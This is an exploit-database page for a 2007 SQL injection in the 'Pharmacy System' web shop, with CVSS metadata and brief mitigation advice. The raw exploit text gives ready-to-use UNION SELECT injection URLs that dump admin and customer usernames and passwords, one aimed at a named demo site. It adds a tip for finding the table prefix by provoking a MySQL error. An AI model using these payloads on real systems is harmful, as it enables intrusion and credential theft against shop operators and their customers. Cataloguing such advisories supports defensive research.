Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS

vendor:

Pharmacy System

by:

t0pP8uZz & xprog

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Pharmacy System

Affected Version From: Pharmacy System v2 and prior versions

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS

The Pharmacy System v2 and prior versions are vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending specially crafted SQL queries to the application, which can lead to unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, implementing parameterized queries or using an ORM (Object-Relational Mapping) framework can help prevent SQL Injection attacks.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+             Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS           +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog


SCRIPT DOWNLOAD: PAY SCRIPT


SITE: http://www.netartmedia.net/pharmacysystem/


DORK: N/A


EXPLOITS:

EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users

EXAMPLES:

EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users

NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix
follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to
see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection
if you cant do that then dont use the exploit.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net


--==+================================================================================+==--
--==+            Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS            +==--
--==+================================================================================+==-- 

# milw0rm.com [2007-06-24]